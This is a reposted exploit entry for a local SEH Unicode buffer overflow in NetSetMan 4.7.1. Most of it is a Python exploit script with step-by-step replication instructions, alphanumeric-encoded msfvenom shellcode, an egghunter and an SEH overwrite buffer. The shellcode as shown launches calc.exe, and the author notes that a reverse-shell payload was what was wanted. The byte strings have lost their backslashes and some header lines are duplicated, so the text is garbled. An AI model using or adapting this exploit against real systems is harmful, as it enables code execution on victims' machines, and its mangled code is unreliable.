NetSetMan 4.7.1 Buffer Overflow

Details
Category: Vulnerabilities
Hits: 293
#Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)
#Exploit Author: Devin Casadey
#Discovery Date: 2019-03-11
#Vendor Homepage: https://www.netsetman.com/
#Softw #Exploit Title: NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)
#Exploit Author: Devin Casadey
#Discovery Date: 2019-03-11
#Vendor Homepage: https://www.netsetman.com/
#Software Link: https://www.netsetman.com/netsetman.exe
#Tested Version: 4.7.1
#Tested on: Windows XP SP3

#-------------------------------------------------------------------------------

#Steps to replicate:
#1. Run the Python code below which outputs two payload .txt files.
#2. Open NetSetMan
#3. Enable "Workgroup" for both the "[Double Click!]" tab and "SET1" tab
#4. Paste contents of "payload2.txt" into the "Workgroup" field in the "SET1" tab.
#5. Paste contents of "payload1.txt" into the "Workgroup" field in the "[Double Click!]" tab.
#6. Click "Activate"
#7. ...
#8. Profit

#This is a unicode SEH overflow, but the buffer is too small for a unicode encoded reverse shell payload.
#Therefore, an egghunter is implemented to locate an alphanumeric encoded payload stored in memory.

#-------------------------------------------------------------------------------

# msfvenom -p windows/exec cmd=calc.exe -b "x00" -e x86/alpha_mixed -f python
#-v shellcode EXITFUNC=seh BufferRegister=EDI
#Payload size: 440 bytes
shellcode = ""
shellcode = "w00tw00t"
shellcode += "x57x59x49x49x49x49x49x49x49x49x49x49"
shellcode += "x49x49x49x49x49x49x37x51x5ax6ax41x58"
shellcode += "x50x30x41x30x41x6bx41x41x51x32x41x42"
shellcode += "x32x42x42x30x42x42x41x42x58x50x38x41"
shellcode += "x42x75x4ax49x69x6cx59x78x6dx52x57x70"
shellcode += "x43x30x75x50x53x50x6cx49x49x75x36x51"
shellcode += "x39x50x71x74x6cx4bx56x30x46x50x4ex6b"
shellcode += "x71x42x46x6cx4ex6bx76x32x57x64x6ex6b"
shellcode += "x44x32x34x68x76x6fx6dx67x43x7ax71x36"
shellcode += "x44x71x6bx4fx6ex4cx57x4cx65x31x33x4c"
shellcode += "x47x72x36x4cx75x70x6fx31x5ax6fx34x4d"
shellcode += "x67x71x39x57x48x62x4ax52x43x62x46x37"
shellcode += "x6cx4bx32x72x32x30x6cx4bx71x5ax45x6c"
shellcode += "x6ex6bx70x4cx32x31x73x48x4ax43x63x78"
shellcode += "x56x61x6ex31x56x31x6ex6bx30x59x57x50"
shellcode += "x35x51x79x43x6cx4bx72x69x55x48x4dx33"
shellcode += "x46x5ax52x69x4ex6bx77x44x6ex6bx76x61"
shellcode += "x68x56x75x61x6bx4fx6cx6cx59x51x78x4f"
shellcode += "x66x6dx77x71x4bx77x30x38x6dx30x51x65"
shellcode += "x58x76x53x33x43x4dx69x68x67x4bx73x4d"
shellcode += "x67x54x50x75x4bx54x62x78x4cx4bx73x68"
shellcode += "x76x44x57x71x68x53x71x76x6ex6bx56x6c"
shellcode += "x72x6bx6ex6bx43x68x47x6cx66x61x6ex33"
shellcode += "x6ex6bx76x64x6cx4bx36x61x6ax70x6dx59"
shellcode += "x31x54x76x44x66x44x63x6bx61x4bx65x31"
shellcode += "x51x49x50x5ax73x61x59x6fx79x70x51x4f"
shellcode += "x71x4fx43x6ax4ex6bx55x42x5ax4bx4cx4d"
shellcode += "x73x6dx61x7ax37x71x6cx4dx6cx45x58x32"
shellcode += "x55x50x45x50x43x30x36x30x52x48x64x71"
shellcode += "x6cx4bx32x4fx4ex67x59x6fx79x45x4fx4b"
shellcode += "x6bx4ex56x6ex75x62x48x6ax65x38x6fx56"
shellcode += "x4ax35x6dx6dx6fx6dx6bx4fx68x55x75x6c"
shellcode += "x53x36x43x4cx36x6ax4bx30x4bx4bx6dx30"
shellcode += "x34x35x77x75x4fx4bx62x67x64x53x30x72"
shellcode += "x72x4fx30x6ax53x30x43x63x4bx4fx68x55"
shellcode += "x42x43x30x61x70x6cx31x73x44x6ex30x65"
shellcode += "x32x58x51x75x55x50x41x41"

egghunter =(
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIA"
"IAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30A"
"PB944JBC6SQGZKOLO0B0RQZOSR88MNNOLKUPZSDJO6XT7NPNP3DTKKJ6OD5JJ"
"6OBUK7KOYWLJA"
)

regPrep = (
"x63" #nop/align
"x55" #push ebp
"x62" #nop/align
"x58" #pop eax
"x62" #nop/align
"x05x14x11" #add eax, 0x11001400
"x62" #nop/align
"x2dx13x11" #sub eax, 0x11001300
"x62" #nop/align
"x50" #push eax
"x62" #nop/align
"xc3") #ret

buffer = ""
buffer += "x61" * 75 #junk
buffer += "x62" * 1 #nop

#0x00590058 : pop ebx # pop ebp # ret 0x08 | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [netsetman.exe]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.7.1.0 (C:Program FilesNetSetMan etsetman.exe)
buffer += "x58x59" #SEH overwrite to pop-pop-ret instruction
buffer += regPrep
buffer += "x62" * 108 #offset to egghunter
buffer += egghunter

#Write initial SEH overflow payload + egghunter with venetian shellcode
f = open('payload1.txt','w')
f.write(buffer)
f.close()

#Egg + alphanumeric encoded shellcode payload
g = open('payload2.txt', 'w')
g.write(shellcode)
g.close()